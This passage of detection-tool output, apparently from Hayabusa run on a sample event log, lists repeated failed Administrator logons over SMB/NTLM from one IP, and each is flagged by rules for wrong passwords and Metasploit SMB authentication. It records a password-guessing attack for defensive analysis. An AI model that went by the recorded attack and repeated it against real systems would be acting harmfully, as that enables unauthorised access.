SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FZlmUbCNAJga24JH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Zf3aSGBMe97VujaH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8bx7ZM77aDG7y6Lh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BnHHAClMwyqA3TTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 00ibRrYvnFt5w9X0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VglTKbnLVFvHZHzQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3NwX0sDFwHQG7Tkq : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.358 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3mMx3M1zurKMBzyj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sH7b8P0O0uea3PlN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.468 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJcrTyBPuX0TcvOT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwuZIQAL3BmJnPsJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lxgAfsnH6YWLRD0a : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.620 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ttBOjzmEBjr9W2QW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.680 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FPDKGGYkJQeWgtUf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.732 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nSoJWqS6YPbpCiBf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.848 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pr2oMzxv7pcDfsgw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jiopmZAMpwg3dEaA : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.940 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG1Bxm0lt3vwoO5V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:55.989 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Kf5AaQX7KOVAIAN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.043 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FW9nBirBTHIXIrfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.097 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9qKcDhfcf2kMk00 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9NgStzf2xQ4P7q0d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9mCrjQykX06IcMf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 7S0QccvEhetekdDP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n1OnibuatFHwDeLz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O8u26bKzFOw12m0T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.342 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WEEtOj6BOkI7MPY1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EiCpuqll36DojD3e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.420 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p9zjo9ZsSVLZcrsr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.469 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KKDD0O5flEsIEDRZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.530 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jdPMREVdBEJ50ELC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p7YwRYYCnsr2v08C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.626 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWyAzzpmxUm2CXE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 9RNqhxyUBjUIic0n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1JERyz3mOBZt2jki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.774 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V0i93RW5AOsIKKMU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U3XEu06vE68O900O : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.875 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0fxeGE2jXOnoJttj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6Wdg3l6IFHTdh09j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:56.969 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XLVQRnkUd3bfgvF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.028 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rHjqFQwqpCJFI6qP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.080 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L5pEWq2mYsFpFLbb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.139 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HSFKJXTC2wlyw0gu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: vh5igCJpAA5rmqzV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.225 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5NzLlJWkfXDcm64c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.260 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: i9sR1QHgZ4oaa82F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.309 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:57.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pq1GWcKzSHSP28hk : IP Address: 192.168.198.149 : AuthPackage: 
